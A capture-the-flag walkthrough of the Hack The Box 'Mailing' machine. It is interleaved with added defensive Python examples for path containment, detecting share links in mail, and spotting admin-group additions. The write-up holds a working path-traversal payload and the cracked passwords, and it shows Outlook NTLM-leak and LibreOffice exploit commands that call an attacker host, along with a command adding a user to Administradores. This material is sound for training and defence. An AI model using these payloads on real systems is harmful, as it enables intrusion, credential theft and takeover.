Mailing — Hack The Box
| Info | Value |
|---|---|
| OS | Windows |
| Difficulty | Easy |
| IP | 10.129.232.39 |
| Hostname | mailing.htb |
| Services | SMTP/hMailServer (25,465,587), HTTP/IIS (80), POP3 (110), IMAP (143,993), SMB (445), WinRM (5985) |
Enumeration
Nmap
nmap -sC -sV -p- -vvv -oA scan/nmap.scan mailing.htb

PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER TOP UIDL
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: IMAP4rev1 IDLE NAMESPACE SORT QUOTA ACL CHILDREN
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
993/tcp open ssl/imap hMailServer imapd
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Info from SSL certificate
The certificate on port 465/587/993 reveals:
- CN: mailing.htb
- Email: ruy@mailing.htb (first user found)
- Org: Mailing Ltd, Madrid, Spain
SMB signing not required:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required

Directory Bruteforce
feroxbuster -u http://mailing.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x js,html,php,txt,json,docx -o scan/root.dir

Relevant results:
| Status | Path |
|---|---|
| 200 | /download.php |
| 200 | /index.php |
| 301 | /assets/ |
| 301 | /instructions/ |
Web Application — instructions.pdf
The /instructions/ directory contains a PDF: instructions.pdf — guide to configure mail clients (Windows Mail, Thunderbird) to connect to mailing.htb.
Info from PDF
- Confirms users: maya@mailing.htb (recipient in demos), ruy@mailing.htb (from SSL certificate)
- Clients on the machine use Windows Mail and/or Thunderbird (with Outlook as viewer — relevant for CVE)
- Mail server: IMAP4 on mailing.htb, SMTP on mailing.htb
Foothold
LFI on download.php — Leak hMailServer.INI
See also: 7 — File Inclusion & Path Traversal and MailServer
The file parameter in download.php is vulnerable to path traversal with backslash (Windows):

curl --path-as-is -i -s -k -X 'GET' \
'http://mailing.htb/download.php?file=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Program%20Files%20(x86)%2fhMailServer%2fBin%2fhMailServer%2eINI'

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.3.3
Content-Disposition: attachment; filename="hMailServer.INI"

[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

Credentials found
- AdministratorPassword: 841bb5acfa6779ae432fd7a4e6600ba7 (MD5)
- Database Password: 0a9f8ad8bf896b501dde74f08efd7e4c
The administrator's MD5 hash is easily cracked:

hashcat -m 0 841bb5acfa6779ae432fd7a4e6600ba7 /usr/share/wordlists/rockyou.txt

| Hash | Password |
|---|---|
| 841bb5acfa6779ae432fd7a4e6600ba7 | homenetworkingadministrator |
SMTP Credentials: administrator@mailing.htb : homenetworkingadministrator
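A containment check that refuses the download.php traversal above, as an added example (not code from the target application, whose source the page does not show). `BASE_DIR`, `resolve_download` and `PAGE_PAYLOAD` are hypothetical names; Python's `ntpath` is used so that Windows path rules apply on any platform.

```python
import ntpath
from typing import Optional
from urllib.parse import unquote

# Hypothetical download root: the page does not show where download.php reads from.
BASE_DIR = r"C:\inetpub\wwwroot\downloads"

def resolve_download(requested: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Return the absolute path to serve, or None when the request must be refused."""
    name = unquote(requested)                 # decode the raw query value once
    if "\x00" in name or "%" in name:         # NUL byte or leftover double encoding
        return None
    drive, rest = ntpath.splitdrive(name)
    # Refuse drive letters, UNC prefixes, rooted paths and alternate data streams.
    if drive or rest.startswith(("\\", "/")) or ":" in rest:
        return None
    base = ntpath.normpath(base_dir)
    # ntpath treats "\" and "/" alike, so "..\" and "../" are both collapsed here.
    candidate = ntpath.normpath(ntpath.join(base, name))
    try:
        inside = ntpath.commonpath([base, candidate]) == base
    except ValueError:                        # paths ended up on different drives
        return None
    return candidate if inside and candidate != base else None

# The request from the page, as the raw value of the file parameter.
PAGE_PAYLOAD = (r"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
                r"Program%20Files%20(x86)%2fhMailServer%2fBin%2fhMailServer%2eINI")

if __name__ == "__main__":
    for value in ("instructions.pdf", "sub/../instructions.pdf", PAGE_PAYLOAD):
        print(repr(value), "->", resolve_download(value))
```

The decision is made on the normalized absolute path, not on the presence of `..` in the input, so mixed separators and encoded variants are judged by where they resolve.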
CVE-2024-21413 — MonikerLink (Outlook NTLM Leak)
Vulnerability
CVE-2024-21413 — Microsoft Outlook Remote Code Execution via MonikerLink. Allows sending an email containing a link to an SMB share (\\attacker\share) that forces the Outlook client to authenticate via NTLM without user interaction (zero-click). The NTLMv2 hash is captured by the attacker.

Ref: https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Step 1 — Start Responder
sudo responder -I tun0 -wv

Step 2 — Send the malicious email
python3 CVE-2024-21413.py \
--server mailing.htb \
--port 587 \
--username 'administrator@mailing.htb' \
--password 'homenetworkingadministrator' \
--sender 'administrator@mailing.htb' \
--recipient 'maya@mailing.htb' \
--url '\\<ATTACKER_IP>\tmp\test.txt' \
--subject Test

The email is sent via port 587 (SMTP Submission with auth). Maya opens the email in Outlook → the client attempts to access the SMB share → Responder captures the NTLMv2 hash.
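On the receiving side, a mail filter can flag messages whose HTML body links to a file share before a client renders them. The following is an added example, not part of the original write-up or of any tool it uses; `share_links`, `LinkCollector` and the sample message are constructed for illustration.

```python
import re
from email import message_from_string, policy
from html.parser import HTMLParser

FILE_SCHEME = re.compile(r"^file:", re.I)
# Two slashes or backslashes followed by a host name, i.e. a UNC-style target.
UNC_HOST = re.compile(r"^[\\/]*[\\/]{2}([^\\/:]+)(?=[\\/]|$)")

class LinkCollector(HTMLParser):
    """Collect href/src attribute values from an HTML body."""
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        self.targets += [v.strip() for k, v in attrs if k in ("href", "src") and v]

def share_links(raw_message):
    """Return (target, host) for every link that points at a file share."""
    msg = message_from_string(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = LinkCollector()
        collector.feed(part.get_content())
        for target in collector.targets:
            is_file = FILE_SCHEME.match(target)
            rest = target[5:] if is_file else target   # drop the "file:" prefix
            host = UNC_HOST.match(rest)
            if is_file or host:
                hits.append((target, host.group(1) if host else None))
    return hits

# Constructed sample message; 192.0.2.10 is a documentation address.
SAMPLE = r"""From: administrator@mailing.htb
To: maya@mailing.htb
Subject: Test
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<a href="file:///\\192.0.2.10\tmp\test.txt">report</a>
<a href="https://mailing.htb/instructions/">docs</a>
</body></html>
"""

if __name__ == "__main__":
    print(share_links(SAMPLE))
```

The extracted host is what an egress rule for TCP 445 or a quarantine decision would key on; ordinary `https` links are left alone.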
Step 3 — Capture NTLMv2
[SMB] NTLMv2-SSP Client : 10.129.232.39
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:85267b37d940ab5a:67A589D74C2805844383A831FE65117B:0101000000000000801A628F37A4DC01...

User
Cracking NTLMv2
hashcat hash.txt /usr/share/wordlists/rockyou.txt -m 5600

MAYA::MAILING:...:m4y4ngs4ri
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Time.Started.....: Sun Feb 22 20:13:39 2026 (0 secs)
Speed.#*.........: 32681.3 kH/s

| Username | Password | Domain |
|---|---|---|
| maya | m4y4ngs4ri | MAILING |
WinRM — Shell as maya
evil-winrm -i mailing.htb -u maya -p 'm4y4ngs4ri'

*Evil-WinRM* PS C:\Users\maya\Documents> ls
Directory: C:\Users\maya\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/13/2024 4:49 PM WindowsPowerShell
-a---- 3/22/2025 4:25 PM 2257 mail.py

User flag in C:\Users\maya\Desktop\user.txt.
Privilege Escalation
See also: PrivilegeEscalationWindows
CVE-2023-2255 — LibreOffice RCE via .odt
Vulnerability
CVE-2023-2255 — LibreOffice < 24.2.4 allows arbitrary command execution via a malicious .odt file exploiting Floating Frames. A specially crafted .odt file executes commands when opened.
The machine has LibreOffice 7.4 installed, vulnerable to the CVE.
Note
You also need to download the samples/ folder from the exploit repository to generate the .odt file.
Step 1 — Test RCE with callback
Generate a test .odt to verify execution:
python3 CVE-2023-2255.py --cmd 'curl http://<ATTACKER_IP>:80/mario' --output 'exploit.odt'

Upload to the target machine in the directory C:\Important Documents\ (monitored by a task that automatically opens documents):

*Evil-WinRM* PS C:\Important Documents> upload exploit.odt

After a few seconds, you receive the HTTP callback → RCE confirmed.
Step 2 — Add maya to the Administrators group
Spanish locale
The machine is in Spanish — the Administrators group is named Administradores.

python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'

*Evil-WinRM* PS C:\Important Documents> upload exploit.odt

Step 3 — Access as admin
After logging out and logging back in with evil-winrm, maya is in the Administradores group and can access other users’ directories:
*Evil-WinRM* PS C:\Users\localadmin> ls
Directory: C:\Users\localadmin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 3/13/2024 4:49 PM 3D Objects
d-r--- 3/13/2024 4:49 PM Contacts
d-r--- 4/4/2024 2:06 PM Desktop
d-r--- 3/13/2024 4:49 PM Documents
d-r--- 3/13/2024 4:49 PM Downloads
d-r--- 3/13/2024 4:49 PM Favorites
d-r--- 3/13/2024 4:49 PM Links
d-r--- 3/13/2024 4:49 PM Music
d-r--- 3/13/2024 4:49 PM Pictures
d-r--- 3/13/2024 4:49 PM Saved Games
d-r--- 3/13/2024 4:49 PM Searches
d-r--- 3/13/2024 4:49 PM Videos

Root flag in C:\Users\localadmin\Desktop\root.txt.
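The group change in Step 2 is recorded as Security event 4732, and the Spanish locale matters for detection: a rule keyed on the name "Administrators" would not match "Administradores", while the group's well-known SID is the same in every language. An added example (not from the original write-up) over constructed events; the `<Events>` wrapper, the member SID and the actor name are placeholders.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
ADMINS_SID = "S-1-5-32-544"   # BUILTIN\Administrators, identical in every locale

def admin_group_additions(events_xml):
    """Return (actor, member_sid, group_name) for each addition to local admins."""
    hits = []
    for ev in ET.fromstring(events_xml).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4732":
            continue
        data = {d.get("Name"): (d.text or "")
                for d in ev.findall("e:EventData/e:Data", NS)}
        if data.get("TargetSid") == ADMINS_SID:   # match the SID, not the name
            hits.append((data.get("SubjectUserName"), data.get("MemberSid"),
                         data.get("TargetUserName")))
    return hits

# Constructed events: one addition to Administradores, one to an unrelated group.
SAMPLE = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4732</EventID><Computer>MAILING</Computer></System>
  <EventData>
    <Data Name="MemberSid">S-1-5-21-1111111111-2222222222-3333333333-1001</Data>
    <Data Name="TargetUserName">Administradores</Data>
    <Data Name="TargetSid">S-1-5-32-544</Data>
    <Data Name="SubjectUserName">EXAMPLE-ACTOR</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4732</EventID><Computer>MAILING</Computer></System>
  <EventData>
    <Data Name="MemberSid">S-1-5-21-1111111111-2222222222-3333333333-1001</Data>
    <Data Name="TargetUserName">Usuarios</Data>
    <Data Name="TargetSid">S-1-5-32-545</Data>
    <Data Name="SubjectUserName">EXAMPLE-ACTOR</Data>
  </EventData>
</Event>
</Events>"""

if __name__ == "__main__":
    for actor, member, group in admin_group_additions(SAMPLE):
        print(f"{actor} added {member} to {group}")
```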
Attack Chain Summary
Web enum → /instructions/instructions.pdf → users: maya, ruy
│
↓
LFI (download.php?file=..\..\..) → hMailServer.INI
│ AdministratorPassword MD5 → homenetworkingadministrator
↓
CVE-2024-21413 (MonikerLink) → mail to maya with SMB link
│ Responder captures NTLMv2 hash of maya
↓
hashcat -m 5600 → m4y4ngs4ri
│
↓
evil-winrm maya@mailing.htb → user flag
│
↓
CVE-2023-2255 (LibreOffice .odt) → RCE
│ net localgroup Administradores maya /add
↓
maya admin → C:\Users\localadmin\Desktop\root.txt